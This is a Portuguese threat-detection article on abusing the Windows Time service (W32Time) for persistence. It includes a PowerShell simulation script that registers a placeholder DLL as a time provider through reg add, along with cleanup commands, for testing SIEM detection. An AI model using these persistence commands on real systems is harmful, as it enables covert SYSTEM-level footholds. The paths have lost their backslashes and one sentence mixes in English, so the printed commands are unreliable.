SOC Prime Bias: Crítico

25 Mar 2026 18:21

T1547.003 Provedores de Tempo no MITRE ATT&CK Explicados

Author Photo
Ruslan Mikhalov Chefe de Pesquisa de Ameaças na SOC Prime linkedin icon Seguir
T1547.003 Provedores de Tempo no MITRE ATT&CK Explicados
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O artigo explica como atacantes podem estabelecer persistência no Windows abusando do serviço W32Time. Registrando uma DLL maliciosa como um provedor de tempo através de uma alteração no registro, o payload é carregado automaticamente sempre que o serviço é iniciado. Este método esconde a execução maliciosa por trás de um componente legítimo do Windows, ajudando o atacante a misturar a atividade de persistência no comportamento normal do sistema.

Investigação

O relatório não foca em uma amostra específica de malware ou campanha de intrusão. Em vez disso, percorre o processo técnico que um atacante poderia usar para alterar as configurações do registro do serviço W32Time e forçar o carregamento de uma DLL maliciosa. Também destaca a sintaxe de comando relevante e o caminho do registro necessário para implementar o abuso.

Mitigação

As organizações devem usar a Política de Grupo para proteger os arquivos do serviço W32Time e as chaves de registro relacionadas contra modificações não autorizadas. O acesso de gravação do registro deve ser limitado a administradores de confiança, e os defensores devem monitorar alterações na subchave TimeProviders. Verificações de integridade de arquivos para DLLs do W32Time e controles rigorosos de menor privilégio para a conta de Servidor Local podem reduzir ainda mais o risco.

Resposta

As equipes de detecção devem alertar sobre a criação ou modificação de subchaves abaixo do caminho do registro W32TimeTimeProviders. Valores de registro referenciando DLLs desconhecidas devem ser investigados imediatamente. Esses sinais devem ser correlacionados com a atividade do processo envolvendo o carregamento de uma DLL não padrão pelo w32tm.exe, juntamente com qualquer comportamento de persistência relacionado.

Fluxo de Ataque

Ainda estamos atualizando esta parte. Inscreva-se para ser notificado

Notifique-me

Execução de Simulação

Pré-requisito: A Verificação de Pré-voo de Telemetria & Base deve ter passado.

  • Narrativa do Ataque & Comandos:
    Um adversário com direitos de administrador local quer uma persistência que sobreviva a reinicializações do sistema e seja difícil de detectar. Eles escolhem abusar do Serviço de Horário do Windows (W32Time) registrando uma DLL maliciosa como um provedor de tempo. Esta técnica aproveita o legítimo utilitário reg.exe (living‑off‑the‑land) para modificar a chave de registro utility (living‑off‑the‑land) to modify the registry key HKLMSystemCurrentControlSetServicesW32TimeTimeProviders<CustomProvider>. Uma vez que o serviço carrega a DLL na inicialização, o atacante ganha execução de código com privilégios SYSTEM.

  • Script de Teste de Regressão:

    # -------------------------------------------------
    #   Registrar DLL maliciosa como Provedor de Tempo do W32Time
    # -------------------------------------------------
    $providerName = "MaliciousTimeProvider"
    $dllPath      = "C:TempevilTime.dll"
    
    # 1. Criar um espaço reservado para DLL maliciosa fictícia (apenas para teste)
    New-Item -Path $dllPath -ItemType File -Force | Out-Null
    
    # 2. Adicionar a chave de registro do provedor de tempo
    $regPath = "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName"
    reg add "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName" /v "Dll" /t REG_SZ /d $dllPath /f
    
    # 3. Habilitar o provedor (valor Enabled = 1)
    reg add "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName" /v "Enabled" /t REG_DWORD /d 1 /f
    
    Write-Host "Provedor de tempo malicioso registrado. Verifique o SIEM para detecção."
  • Comandos de Limpeza:

    # -------------------------------------------------
    #   Remover registro de provedor de tempo malicioso
    # -------------------------------------------------
    $providerName = "MaliciousTimeProvider"
    $regPath = "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName"
    
    # Excluir a chave do provedor de forma recursiva
    reg delete "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName" /f
    
    # Remover o arquivo DLL fictício
    Remove-Item "C:TempevilTime.dll" -Force -ErrorAction SilentlyContinue
    
    Write-Host "Limpeza completa."